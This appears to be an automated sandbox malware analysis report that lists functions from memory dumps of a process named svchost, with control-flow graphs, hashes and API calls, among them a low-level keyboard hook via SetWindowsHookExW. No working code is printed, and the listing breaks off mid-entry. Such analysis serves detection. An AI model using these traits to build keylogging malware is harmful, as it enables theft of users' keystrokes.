                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 05A657E0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46threadCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 166 5a657e0-5a65854 ResumeThread 169 5a65856-5a6585c 166->169 170 5a6585d-5a65871 166->170 169->170
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.451141243.0000000005A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A60000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_5a60000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: ResumeThread
                                                                                        • String ID: uyQ
                                                                                        • API String ID: 947044025-426589555
                                                                                        • Opcode ID: f54831b8502c1e0608fdfd060db39e32ff67321b88567ab9328885228d32869a
                                                                                        • Instruction ID: 63d0e66c8211df8a50d9753b464f88e4e194fc753f0aca7d8a41cce872f60d7d
                                                                                        • Opcode Fuzzy Hash: f54831b8502c1e0608fdfd060db39e32ff67321b88567ab9328885228d32869a
                                                                                        • Instruction Fuzzy Hash: A41133B5C002098FCB20CFAAD584BDEBFF4EB48324F20846AD419B7600C774A944CFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 05A657E8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 43threadCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 172 5a657e8-5a65854 ResumeThread 174 5a65856-5a6585c 172->174 175 5a6585d-5a65871 172->175 174->175
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.451141243.0000000005A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A60000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_5a60000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: ResumeThread
                                                                                        • String ID: uyQ
                                                                                        • API String ID: 947044025-426589555
                                                                                        • Opcode ID: 57b101e6f3aa7700b8538b3db845450e36a41aa709019ce996e5a907fc9d84ce
                                                                                        • Instruction ID: f150f1bc77e3973c87a52b4d015f9459d97eca9bd75bbf6689124f56b75d4bdd
                                                                                        • Opcode Fuzzy Hash: 57b101e6f3aa7700b8538b3db845450e36a41aa709019ce996e5a907fc9d84ce
                                                                                        • Instruction Fuzzy Hash: 3C1112B5C002498FCB20CF9AD584BDEBFF4EB48320F20846AD519A7640C774A944CFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Execution Graph

                                                                                        Execution Coverage:15.6%
                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                        Signature Coverage:15.8%
                                                                                        Total number of Nodes:19
                                                                                        Total number of Limit Nodes:0
                                                                                        execution_graph 14942 53be2c8 14946 53be2f8 14942->14946 14950 53be2e8 14942->14950 14943 53be2d7 14947 53be317 14946->14947 14954 53bb690 14947->14954 14949 53be33a 14949->14949 14951 53be2f8 14950->14951 14952 53bb690 SetWindowsHookExW 14951->14952 14953 53be33a 14952->14953 14956 53bea08 SetWindowsHookExW 14954->14956 14957 53bea92 14956->14957 14957->14949 14934 53b25f0 14935 53b260e 14934->14935 14938 53b21cc 14935->14938 14937 53b2645 14941 53b4110 14938->14941 14939 53b41ca LoadLibraryA 14940 53b4209 14939->14940 14941->14939 14941->14941

                                                                                        Executed Functions

                                                                                        Function 014D2A1E Relevance: 2.0, Strings: 1, Instructions: 795COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.651016367.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_14d0000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: .
                                                                                        • API String ID: 0-248832578
                                                                                        • Opcode ID: 63567e5525b36cd33c558793604f83aa868fe52993360fec28a3afc4aeaf234c
                                                                                        • Instruction ID: 90c55ab613adccc94fa551e452ced44eb54fe5b6692744ae2ca571f5753fa8ec
                                                                                        • Opcode Fuzzy Hash: 63567e5525b36cd33c558793604f83aa868fe52993360fec28a3afc4aeaf234c
                                                                                        • Instruction Fuzzy Hash: 1C72A270A10255CFDF25CF28C890BADBBB2BF45310F1881AAD9499B3A6D7749D81CF91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 053BB690 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 871 53bb690-53bea52 874 53bea5e-53bea90 SetWindowsHookExW 871->874 875 53bea54 871->875 876 53bea99-53beabe 874->876 877 53bea92-53bea98 874->877 878 53bea5c 875->878 877->876 878->874
                                                                                        APIs
                                                                                        • SetWindowsHookExW.USER32(0000000D,00000000,?,?), ref: 053BEA83
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.665992057.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_53b0000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: HookWindows
                                                                                        • String ID:
                                                                                        • API String ID: 2559412058-0
                                                                                        • Opcode ID: 6ff1742d92845982f312b0e04eb38ef3ace78af3dd4c5641ecadacf9d3c1b505
                                                                                        • Instruction ID: 700c84f5ec68ec8f7926183501c66bbee4db7ba5b922e7eaaf1690ecc8658361
                                                                                        • Opcode Fuzzy Hash: 6ff1742d92845982f312b0e04eb38ef3ace78af3dd4c5641ecadacf9d3c1b505
                                                                                        • Instruction Fuzzy Hash: 0D2115B5D002099FDB10DF9AD844BEEBBF9FB88310F108429E419A7650CBB4A944DFA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 014D1660 Relevance: 1.1, Instructions: 1063COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.651016367.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_14d0000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 610ef5753ef235c7c2a47c594e8397b1bd531475f67649fc7c3ed9e3c6dc5fb2
                                                                                        • Instruction ID: 5c9295a7f0ffb74e22fda86a9b19e5d67368bdb33293dc0139a2c609f9ce0257
                                                                                        • Opcode Fuzzy Hash: 610ef5753ef235c7c2a47c594e8397b1bd531475f67649fc7c3ed9e3c6dc5fb2
                                                                                        • Instruction Fuzzy Hash: 35A2BC70A00214CFDB24CB18C994FA9BBF2AF45305F1881EAD5999B366C7B5ED85CF50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 053B4104 Relevance: 1.6, APIs: 1, Instructions: 98libraryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 211 53b4104-53b4167 212 53b41bb-53b4207 LoadLibraryA 211->212 213 53b4169-53b418e 211->213 216 53b4209-53b420f 212->216 217 53b4210-53b4241 212->217 213->212 218 53b4190-53b4192 213->218 216->217 223 53b4243-53b4247 217->223 224 53b4251 217->224 220 53b41b5-53b41b8 218->220 221 53b4194-53b419e 218->221 220->212 225 53b41a2-53b41b1 221->225 226 53b41a0 221->226 223->224 227 53b4249 223->227 229 53b4252 224->229 225->225 228 53b41b3 225->228 226->225 227->224 228->220 229->229
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.665992057.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_53b0000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad
                                                                                        • String ID:
                                                                                        • API String ID: 1029625771-0
                                                                                        • Opcode ID: a8631a0ede5f66954943db459879abfce3c77f1a69544a4cc6c1fd8cf8024669
                                                                                        • Instruction ID: cdafa580a8d1e9368ecd74201df162746f18cb0aac6de4dbb988c4d771213c92
                                                                                        • Opcode Fuzzy Hash: a8631a0ede5f66954943db459879abfce3c77f1a69544a4cc6c1fd8cf8024669
                                                                                        • Instruction Fuzzy Hash: 654136B0D106198FEF10CFA9C8847DEBBF2BB48304F108529E915AB781D7B89842CF95
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 053B21CC Relevance: 1.6, APIs: 1, Instructions: 97libraryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 230 53b21cc-53b4167 232 53b41bb-53b4207 LoadLibraryA 230->232 233 53b4169-53b418e 230->233 236 53b4209-53b420f 232->236 237 53b4210-53b4241 232->237 233->232 238 53b4190-53b4192 233->238 236->237 243 53b4243-53b4247 237->243 244 53b4251 237->244 240 53b41b5-53b41b8 238->240 241 53b4194-53b419e 238->241 240->232 245 53b41a2-53b41b1 241->245 246 53b41a0 241->246 243->244 247 53b4249 243->247 249 53b4252 244->249 245->245 248 53b41b3 245->248 246->245 247->244 248->240 249->249
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.665992057.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_53b0000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad
                                                                                        • String ID:
                                                                                        • API String ID: 1029625771-0
                                                                                        • Opcode ID: 1139b7a1de9661452dcafd0c4f07c01bb3eb695f1b8daa060244aa2643ee5c55
                                                                                        • Instruction ID: c4840b1b2443fe11f185c189da6a4383e900798d43c5ad6eb662c7b65b49db2e
                                                                                        • Opcode Fuzzy Hash: 1139b7a1de9661452dcafd0c4f07c01bb3eb695f1b8daa060244aa2643ee5c55
                                                                                        • Instruction Fuzzy Hash: A04125B0D106189FEF10CFA9C8857DEBBF2BB48304F108529E915ABB41D7B89842CF95
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 053BEA01 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 882 53bea01-53bea52 885 53bea5e-53bea90 SetWindowsHookExW 882->885 886 53bea54 882->886 887 53bea99-53beabe 885->887 888 53bea92-53bea98 885->888 889 53bea5c 886->889 888->887 889->885
                                                                                        APIs
                                                                                        • SetWindowsHookExW.USER32(0000000D,00000000,?,?), ref: 053BEA83
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.665992057.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_53b0000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: HookWindows
                                                                                        • String ID:
                                                                                        • API String ID: 2559412058-0
                                                                                        • Opcode ID: 44d6fea265367e05fe419fd84e78abe49b6a284fd80f19aaf2b0e300e1921442
                                                                                        • Instruction ID: 9683593d19d116425c19c9321606004b3a9d700ab3d9961a50cd72a86dc6d694
                                                                                        • Opcode Fuzzy Hash: 44d6fea265367e05fe419fd84e78abe49b6a284fd80f19aaf2b0e300e1921442
                                                                                        • Instruction Fuzzy Hash: CB2115B5D002099FDB10DF9AD844BDEBBF9FB88310F10842AE419A7650CBB4A944DFA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 014D0558 Relevance: .7, Instructions: 721COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.651016367.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_14d0000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 77a2cd8e2adbf9ec60b0f3802fcc89e39e13ca334c34fa43a58c6cb933c58385
                                                                                        • Instruction ID: 03c3fb9d4672ab1d2d7754394f119df3671e58eb61aa5f3addd57fe5f62b942c
                                                                                        • Opcode Fuzzy Hash: 77a2cd8e2adbf9ec60b0f3802fcc89e39e13ca334c34fa43a58c6cb933c58385
                                                                                        • Instruction Fuzzy Hash: 01622A34A006168FCB15CF58D690AAEF7F2FF45310F69855AE449AB222D331FC86CB95
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 014D0E60 Relevance: .3, Instructions: 331COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 2257 14d0e60-14d0e9d call 14d0558 2262 14d0ea0-14d0ea8 2257->2262 2263 14d0eaa-14d0eb8 2262->2263 2264 14d0ee4-14d0f21 2262->2264 2263->2264 2265 14d0eba-14d0ec0 2263->2265 2269 14d1099-14d10ca 2264->2269 2270 14d0f27-14d0f40 2264->2270 2266 14d0ec8-14d0ee3 2265->2266 2267 14d0ec2-14d0ec6 2265->2267 2267->2262 2267->2266 2275 14d1150-14d116c 2269->2275 2276 14d10d0-14d10f7 2269->2276 2271 14d0f50-14d0f62 2270->2271 2272 14d0f42-14d0f49 2270->2272 2271->2269 2274 14d0f68-14d0f78 2271->2274 2272->2271 2277 14d108f-14d1096 2274->2277 2278 14d0f7e 2274->2278 2279 14d116f-14d11a2 2275->2279 2276->2279 2281 14d10f9-14d1119 2276->2281 2280 14d0f81-14d0f96 2278->2280 2287 14d11a8-14d11bb 2279->2287 2288 14d12c1-14d12db 2279->2288 2280->2269 2282 14d0f9c-14d0fa8 2280->2282 2281->2279 2283 14d111b-14d114d 2281->2283 2285 14d0faa-14d0fac 2282->2285 2286 14d0fb2-14d0fb5 2282->2286 2285->2286 2289 14d1080-14d1089 2285->2289 2290 14d0fe8-14d0fea 2286->2290 2291 14d0fb7-14d0fc4 2286->2291 2293 14d12f4-14d131d 2287->2293 2294 14d11c1-14d11d3 2287->2294 2288->2293 2311 14d12dd-14d12f1 2288->2311 2289->2277 2289->2280 2295 14d101d-14d1020 2290->2295 2296 14d0fec-14d0fef 2290->2296 2291->2269 2292 14d0fca-14d0fdb 2291->2292 2292->2269 2297 14d0fe1-14d0fe6 2292->2297 2319 14d131f-14d1328 2293->2319 2320 14d133a-14d135d 2293->2320 2294->2293 2298 14d11d9-14d11ec 2294->2298 2301 14d1033-14d103a 2295->2301 2302 14d1022-14d1029 2295->2302 2299 14d1008-14d100f 2296->2299 2300 14d0ff1-14d0ffb 2296->2300 2305 14d1042-14d104b 2297->2305 2298->2293 2306 14d11f2-14d11ff 2298->2306 2299->2269 2308 14d1015-14d101b 2299->2308 2300->2269 2307 14d1001-14d1005 2300->2307 2301->2269 2310 14d103c-14d103f 2301->2310 2302->2269 2309 14d102b-14d1031 2302->2309 2315 14d105d-14d1060 2305->2315 2316 14d104d-14d105b 2305->2316 2313 14d1201-14d120e 2306->2313 2314 14d1213-14d121f 2306->2314 2307->2299 2308->2305 2309->2305 2310->2305 2326 14d12b2-14d12bb 2313->2326 2314->2293 2321 14d1225-14d1243 2314->2321 2317 14d1072-14d1079 2315->2317 2318 14d1062-14d1070 2315->2318 2316->2289 2317->2289 2318->2289 2319->2320 2322 14d132a-14d1337 call 14d10b0 2319->2322 2329 14d135f-14d1375 2320->2329 2330 14d139e-14d13a0 2320->2330 2321->2293 2331 14d1249-14d124f 2321->2331 2326->2287 2326->2288 2332 14d1377-14d1396 2329->2332 2333 14d13d2-14d140f 2329->2333 2334 14d13be-14d13d1 2330->2334 2335 14d13a2-14d13b8 2330->2335 2336 14d1271-14d1290 call 14d0368 2331->2336 2337 14d1251-14d1259 2331->2337 2332->2333 2339 14d1398-14d139c 2332->2339 2345 14d1411 2333->2345 2346 14d1413-14d1415 2333->2346 2335->2333 2340 14d13ba 2335->2340 2336->2293 2350 14d1292-14d1298 2336->2350 2337->2293 2341 14d125f-14d126c call 14d10b0 2337->2341 2339->2334 2340->2334 2341->2336 2345->2346 2347 14d141f-14d142d 2346->2347 2348 14d1417-14d141e 2346->2348 2351 14d149f-14d1555 2347->2351 2352 14d142f-14d143b 2347->2352 2350->2326 2353 14d129a-14d12a2 2350->2353 2370 14d155e-14d155f 2351->2370 2352->2351 2354 14d143d-14d1443 2352->2354 2353->2293 2356 14d12a4-14d12ad call 14d10b0 2353->2356 2354->2351 2357 14d1445-14d144d 2354->2357 2356->2326 2357->2351 2359 14d144f-14d148d 2357->2359 2363 14d148f-14d1494 2359->2363 2364 14d1497-14d149e 2359->2364 2363->2364
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.651016367.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_14d0000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: be3f1c22549a7cba45e99d8f4e330e9fcb03b43f5cd19ba7e2e47b1bb9dc8739
                                                                                        • Instruction ID: 134c4892a008c7b84075ea7dbf15e67176431c5f2139f1c49b9249aa05bdf4cf
                                                                                        • Opcode Fuzzy Hash: be3f1c22549a7cba45e99d8f4e330e9fcb03b43f5cd19ba7e2e47b1bb9dc8739
                                                                                        • Instruction Fuzzy Hash: 9CD1F370A04655CFCB16CF68C890ABEBBF5FF45314F18859BD8499B222D335E886CB91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 014D0040 Relevance: .3, Instructions: 296COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 2371 14d0040-14d0086 2372 14d008f-14d009a 2371->2372 2373 14d0088-14d008d 2371->2373 2374 14d009d-14d00d4 2372->2374 2373->2374 2375 14d00da-14d00e5 2374->2375 2376 14d0352-14d0371 2374->2376 2375->2376 2377 14d00eb-14d0105 2375->2377 2383 14d038d-14d0395 2376->2383 2384 14d0373-14d0384 2376->2384 2378 14d010b-14d0117 2377->2378 2379 14d0107 2377->2379 2381 14d0119-14d0122 2378->2381 2382 14d0125-14d012f 2378->2382 2379->2378 2381->2382 2382->2376 2387 14d0135-14d013d 2382->2387 2385 14d039e-14d03c4 2383->2385 2386 14d0397-14d039d 2383->2386 2384->2385 2388 14d0386-14d038c 2384->2388 2395 14d03cb 2385->2395 2396 14d03c6-14d03c9 2385->2396 2389 14d0308-14d0314 2387->2389 2390 14d0143-14d014d 2387->2390 2389->2376 2392 14d0316-14d0320 2389->2392 2390->2376 2393 14d0153-14d015b 2390->2393 2397 14d032b-14d0337 2392->2397 2398 14d0322-14d0325 2392->2398 2393->2389 2394 14d0161-14d0164 2393->2394 2394->2376 2399 14d016a-14d0172 2394->2399 2400 14d03cd-14d03e1 call 14d0402 2395->2400 2396->2400 2401 14d0339-14d0340 2397->2401 2402 14d0341-14d0351 2397->2402 2398->2382 2398->2397 2399->2376 2403 14d0178-14d017c 2399->2403 2405 14d03e7-14d03fe 2400->2405 2403->2389 2404 14d0182-14d0186 2403->2404 2404->2376 2406 14d018c-14d0197 2404->2406 2406->2376 2407 14d019d-14d01a1 2406->2407 2407->2389 2409 14d01a7-14d01a9 2407->2409 2410 14d01aa-14d01af 2409->2410 2410->2376 2411 14d01b5-14d01bd 2410->2411 2411->2376 2412 14d01c3-14d01c7 2411->2412 2413 14d01cd-14d01d2 2412->2413 2414 14d02bb-14d02d4 2412->2414 2413->2376 2416 14d01d8-14d01e0 2413->2416 2414->2389 2415 14d02d6-14d02e5 2414->2415 2415->2397 2417 14d02e7-14d02f1 2415->2417 2416->2376 2418 14d01e6-14d01ea 2416->2418 2417->2376 2419 14d02f3-14d02fe 2417->2419 2418->2414 2420 14d01f0-14d01f5 2418->2420 2419->2376 2421 14d0300-14d0305 2419->2421 2420->2376 2422 14d01fb-14d0203 2420->2422 2421->2389 2422->2376 2423 14d0209-14d020d 2422->2423 2423->2414 2424 14d0213-14d0218 2423->2424 2424->2376 2425 14d021e-14d0226 2424->2425 2425->2376 2426 14d022c-14d0230 2425->2426 2426->2414 2427 14d0236-14d023b 2426->2427 2427->2376 2428 14d0241-14d0249 2427->2428 2428->2376 2429 14d024f-14d0253 2428->2429 2429->2414 2430 14d0255-14d025a 2429->2430 2430->2376 2431 14d0260-14d0268 2430->2431 2431->2376 2432 14d026e-14d0272 2431->2432 2432->2414 2433 14d0274-14d0279 2432->2433 2433->2376 2434 14d027f-14d0287 2433->2434 2434->2376 2435 14d028d-14d0291 2434->2435 2435->2414 2436 14d0293-14d0298 2435->2436 2436->2376 2437 14d029e-14d02a6 2436->2437 2437->2376 2438 14d02ac-14d02b0 2437->2438 2438->2414 2439 14d02b2-14d02b5 2438->2439 2439->2410 2439->2414
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.651016367.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_14d0000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 78754c5aa2839fc589183c68e957e3071dd8cd961cccab1737ef7189f3905057
                                                                                        • Instruction ID: b0a08e693321246a9bc35d14256f57a2842bff938d7dc9ffdd97a51a9fcd2b2c
                                                                                        • Opcode Fuzzy Hash: 78754c5aa2839fc589183c68e957e3071dd8cd961cccab1737ef7189f3905057
                                                                                        • Instruction Fuzzy Hash: 39C18E749006669FCF16CB18C5E49BEFBB0FB05310F598256E8A997627C730F891CBA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 014D26A8 Relevance: .3, Instructions: 254COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.651016367.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_14d0000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f44a078cf39c5cd1d89ff2c281a1f225b6c5a5f74c96daf5c874c596c60840b9
                                                                                        • Instruction ID: 1d195875ecb1d82b51c685c32963584b860bdb5d9974093abccc1a4f65a62a9d
                                                                                        • Opcode Fuzzy Hash: f44a078cf39c5cd1d89ff2c281a1f225b6c5a5f74c96daf5c874c596c60840b9
                                                                                        • Instruction Fuzzy Hash: 6FA1E670B002598FDF11DF95C860BAEBBF2FF98710F14465AE511A73A5CBB49842CB91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 014D0548 Relevance: .2, Instructions: 240COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.651016367.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_14d0000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 1bc801fbc3c3a23e0e257d503958276c2a5b1ba7289e9147b53523ebe4b417d8
                                                                                        • Instruction ID: 04fbfb799ff7d641625c770ed27e0ed2505788c75b6c3d08f8e19e66581453fc
                                                                                        • Opcode Fuzzy Hash: 1bc801fbc3c3a23e0e257d503958276c2a5b1ba7289e9147b53523ebe4b417d8
                                                                                        • Instruction Fuzzy Hash: A7B10574A00616CFCB15CF68C694AAEF7F1FF89304F68891AE459A7221D331F885CB95
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 014D1310 Relevance: .2, Instructions: 212COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.651016367.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_14d0000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ddc4a5901d8069b21ba8bd8ffd274ab7cc1a9efea230818bff0ba3100516906d
                                                                                        • Instruction ID: 12d46ef9599b066bcee2011ffad72deac87ec2d3c816c0aeeb848751d13f3434
                                                                                        • Opcode Fuzzy Hash: ddc4a5901d8069b21ba8bd8ffd274ab7cc1a9efea230818bff0ba3100516906d
                                                                                        • Instruction Fuzzy Hash: E681CF319006018FCB65DF69C9809AAFBF1FF85314B19C5AED849DB612E736EC42CB90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 014D0402 Relevance: .1, Instructions: 117COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.651016367.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_14d0000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 113802bef242c120b2a728886fcfa90a9da4267e0313e80aab2a88626440ff43
                                                                                        • Instruction ID: 1017d244aeff4219f84acb3a1c0d77848a80de35cadd0f8e0e949b48a1d14517
                                                                                        • Opcode Fuzzy Hash: 113802bef242c120b2a728886fcfa90a9da4267e0313e80aab2a88626440ff43
                                                                                        • Instruction Fuzzy Hash: 544182307017108FEB698B29D8A4A6F77F6FF88312F14852AF85687364DB349943CB51
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 014D41E5 Relevance: .1, Instructions: 87COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.651016367.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_14d0000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 18b57f486e159a97472f96a146a76c8993dfe94f59ba87ff30542beebbad9247
                                                                                        • Instruction ID: 4730aca4ec8bce0b5606f266f3bc1c94e86ca5661744efd09feef9acf6bf9658
                                                                                        • Opcode Fuzzy Hash: 18b57f486e159a97472f96a146a76c8993dfe94f59ba87ff30542beebbad9247
                                                                                        • Instruction Fuzzy Hash: C9312770D00248DFDF14CFA9C590ADEBFF1AF48350F24852AE809AB250DB389941CFA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 014D21AA Relevance: .1, Instructions: 87COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.651016367.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_14d0000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8b8d5eda5bac52c56b11fe2465f74f412c238a77e8c6215e013fad92f1dcec68
                                                                                        • Instruction ID: d9e673b5d918ef052573671e3dfd791487bd18e19507c35469dcb35893957a20
                                                                                        • Opcode Fuzzy Hash: 8b8d5eda5bac52c56b11fe2465f74f412c238a77e8c6215e013fad92f1dcec68
                                                                                        • Instruction Fuzzy Hash: 37314E74B002159FEB14CB25CD95FAEB7B2AF81304F0480E5E649AB2A1DEB4AD81CB45
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 014D41F0 Relevance: .1, Instructions: 83COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.651016367.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_14d0000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7bc7a5d5449dc8e312d3cecb711e8f4aa87695eb65c5430df3a5e2f9c0669c71
                                                                                        • Instruction ID: 608d1f534e59e16d4951edf739b6b1c89aa29b3991c7d7677ffac49d69661305
